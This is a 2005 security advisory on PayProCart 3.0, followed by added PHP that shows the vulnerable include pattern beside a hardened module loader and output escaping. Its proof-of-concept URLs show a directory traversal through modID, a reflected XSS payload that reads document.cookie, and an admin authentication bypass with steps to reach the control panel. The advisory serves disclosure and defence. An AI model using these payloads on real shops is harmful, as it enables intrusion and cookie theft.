-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's services to audit your web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Authentication bypass, directory traversal and XSS vulnerabilities in PayProCart 3.0 - ProfitCode Software
Date: 05/04/2005

Vendor: ProfitCode Software
Vendor Website: http://www.profitcode.net
Summary: PayProCart 3.0 from ProfitCode Software contains an authentication bypass, a directory traversal in the module loader of index.php and a reflected cross-site scripting flaw in usrdetails.php.

Proof of Concept Exploits:

http://localhost/index.php?modID=../EVIL_VALUE
Directory traversal: the modID parameter is concatenated into an include path without validation, so a "../" component escapes the template directory. Requesting a non-existent file makes PHP return warnings that show the constructed include path and the (masked here) installation path:

Warning: main(tplates/../EVIL_VALUE.php) [function.main]: failed to open stream: No such file or directory in /home/*******/web/*******/index.php on line 159

Warning: main() [function.include]: Failed opening 'tplates/../EVIL_VALUE.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/*******/web/*******/index.php on line 159

http://localhost/usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Cross-site scripting: the sgnuptype parameter is echoed back unescaped. The decoded payload "><script>alert(document.cookie)</script> closes the attribute it is reflected into and pops the cookie.

http://localhost/adminshop/index.php?proMod=index&%3bftoedit=..%2fshopincs%2fmaintopENG
Authentication bypass, gives access to the admin control panel. After a couple of seconds press Stop, then look at the last screen: that is the administration panel, and you now have admin access to the shopping cart.

Possible Fixes: Escape user input with htmlspecialchars() before echoing it to the page, which addresses the XSS in usrdetails.php, and with mysql_real_escape_string() (rather than the older mysql_escape_string(), which ignores the connection character set) before passing it to the MySQL database. Escaping does not close the include in index.php: the modID value must be validated before it is used to build a file path, ideally by checking it against the list of known module names, or at minimum by rejecting any value containing path separators or "..".
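As an added example (not PayProCart's code and not from the advisory's author), the following PHP shows the include pattern that the warnings above imply, next to a hardened module loader and an escaped rendering of the sgnuptype field. The function names, the template directory constant and the KNOWN_MODULES list are assumptions made for illustration.

```php
<?php
// Added example, not PayProCart's code. Names, the template directory and the
// module list below are assumptions for illustration.

// Vulnerable pattern: the module name is concatenated straight into the
// include path, so modID=../EVIL_VALUE resolves to tplates/../EVIL_VALUE.php,
// i.e. any .php file the web server user can read, relative to the script.
function load_module_vulnerable(string $modID): void
{
    include 'tplates/' . $modID . '.php';
}

// Hardened loader: validate the token, check it against the known modules,
// then confirm the resolved file really lives under the template directory.
const TEMPLATE_DIR   = __DIR__ . '/tplates';                 // assumed location
const KNOWN_MODULES  = ['index', 'cart', 'checkout', 'usrdetails']; // assumed names

function resolve_module(string $modID): ?string
{
    // Reject anything that is not a plain identifier before touching the
    // filesystem; this alone stops "..", "/" and "\" from reaching the path.
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $modID)) {
        return null;
    }
    // An allowlist is the real control: unknown module names are refused even
    // if a file with that name happens to exist.
    if (!in_array($modID, KNOWN_MODULES, true)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $modID . '.php');
    // realpath() returns false for a missing file; the prefix check also
    // catches a symlink inside tplates/ that points outside it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_module_hardened(string $modID): void
{
    $path = resolve_module($modID);
    if ($path === null) {
        http_response_code(404);
        exit('unknown module');
    }
    include $path;
}

// XSS fix for the sgnuptype reflection: escape on output, including quotes,
// because the advisory's payload breaks out of an attribute value with %22 (").
function signup_type_field(string $sgnuptype): string
{
    $safe = htmlspecialchars($sgnuptype, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="sgnuptype" value="' . $safe . '">';
}

// Constructed inputs: the two payloads from the advisory plus a benign value.
$modIDs = ['index', '../EVIL_VALUE', '..%2fshopincs%2fmaintopENG'];
foreach ($modIDs as $modID) {
    $verdict = resolve_module(urldecode($modID)) === null ? 'rejected' : 'allowed';
    echo "modID={$modID}: {$verdict}\n";
}
echo signup_type_field('"><script>alert(document.cookie)</script>'), "\n";
```

The vulnerable loader appends ".php" to the value, so the traversal shown in the advisory reaches only files with that extension; the hardened version does not rely on the suffix at all, since the identifier check and the allowlist run before any path is built, and the realpath() prefix check is a second line of defence for the case where the module directory itself contains a stray symlink.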
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-come-out book on secure coding with PHP.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3
UzBEsLKM5uDraMzb/rNUUrRU
=zUyN
-----END PGP SIGNATURE-----